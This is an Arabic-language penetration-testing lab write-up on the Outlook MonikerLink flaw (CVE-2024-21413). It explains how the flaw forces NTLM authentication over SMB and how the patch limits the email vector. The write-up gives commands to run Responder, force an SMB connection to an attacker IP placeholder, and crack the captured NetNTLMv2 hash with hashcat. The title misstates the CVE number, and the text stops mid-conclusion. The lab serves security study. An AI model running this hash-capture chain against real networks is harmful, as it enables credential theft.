
مختبر تم إنشاؤه لاختبار الاختراق للثغرة CVE 2024-214113(MONIKER LINK).
هدف هذا المشروع إلى دراسة الثغرة الأمنية CVE-2024-21413 (MonikerLink)، واستكشاف كيفية إساءة استخدام بروتوكول SMB/NTLM لالتقاط بيانات الاعتماد.
حتى بعد التصحيح الرسمي من مايكروسوفت، يُظهر المختبر أن المفهوم لا يزال صالحًا في السيناريوهات الداخلية.
تم تصنيف الثغرة (CVE-2024-21413)، المعروفة باسم MonikerLink، على أنها حرجة (CVSS 9.8). تحدث لأن Outlook كان يعالج روابط "file://" بطريقة غير آمنة، مستخدمًا واجهات برمجة تطبيقات COM القديمة (كائنات Moniker). سمحت هذه الكائنات لـ Outlook باستدعاء موارد خارجية دون المرور عبر Protected View، مما دفع العميل إلى بدء اتصالات SMB تلقائيًا.
إنها ميزة في Windows تسمح بالإشارة إلى كائنات COM عبر روابط خاصة.
أساء الاستغلال الأصلي استخدام روابط "file://" أو مسارات UNC المرسلة عبر البريد الإلكتروني.
عند إضافة الحرف "!" إلى الرابط، كان من الممكن تجاوز الحمايات الداخلية في Outlook، مما أجبر على الفتح المباشر للمورد الخارجي.
أدى ذلك إلى مصادقة NTLM تلقائية، مما عرض تجزئات NetNTLMv2 للمهاجم دون تفاعل كبير من المستخدم.
التصحيح KB5002519 يحظر تحديدًا هذا السلوك في Outlook، ويمنع معالجة روابط "file://" بهذه الطريقة.
ومع ذلك، تستمر مصادقة NTLM التلقائية في العمل خارج سياق Outlook، أي أن أي محاولة للوصول إلى موارد SMB في بيئة يكون فيها NTLM مفعّلاً ولا توجد قيود مصادقة قد تظل تولّد إرسالًا تلقائيًا للتجزئات.
📌 العلاقة بين Outlook وSMB/NTLM وResponder الاستغلال الأصلي: عبر رسائل بريد إلكتروني عشوائية تحتوي على رابط خبيث ← يعالجه Outlook ← يصادق NTLM تلقائيًا ← يستلم المهاجم التجزئة.
المختبر الداخلي: قمنا بمحاكاة الجزء المفاهيمي فقط ← أجبرنا اتصال SMB يدويًا ← التقط Responder التجزئة ← نفذ Hashcat عملية الكسر.
لماذا لا يزال يعمل؟ لأن NTLM بروتوكول قديم يصادق تلقائيًا على اتصالات SMB، بغض النظر عن Outlook. التصحيح يصلح عميل Outlook، لكنه لا يلغي سلوك NTLM في Windows.


أثناء الاختبارات، حظر Outlook روابط file:// القادمة من البريد الإلكتروني، مع عرض تنبيه أمني:

التصحيح KB5002519، الذي صدر في فبراير 2024، يخفف من الناقل الخارجي عبر البريد الإلكتروني عن طريق حظر روابط file://.
ومع ذلك، لا يزال بروتوكول NTLM يسمح بالمصادقة التلقائية على اتصالات SMB.
هذا يعني أنه على الرغم من أن Outlook محمي ضد هذا الاستغلال المحدد، فإن سطح الهجوم الداخلي يظل صالحًا.
جذر المشكلة يكمن في الاعتماد على NTLM كآلية مصادقة، والتي تظل عرضة لالتقاط التجزئات في اتصالات SMB.
sudo responder -I eth0

عبر Explorer، بالوصول يدويًا إلى:
\\<IP do atacante>\test.

عبر الطرفية (cmd أو PowerShell)، باستخدام الأمر:
net use \\<IP do atacante>\test

/usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

hashcat -m 5600 -a 0 ~/hash.txt /usr/share/wordlists/rockyou.txt
ملاحظة:
لا يتم عرض كلمة المرور الحقيقية لأسباب أمنية. الهدف هو توضيح العملية والثغرة.

أظهر هذا المختبر أن: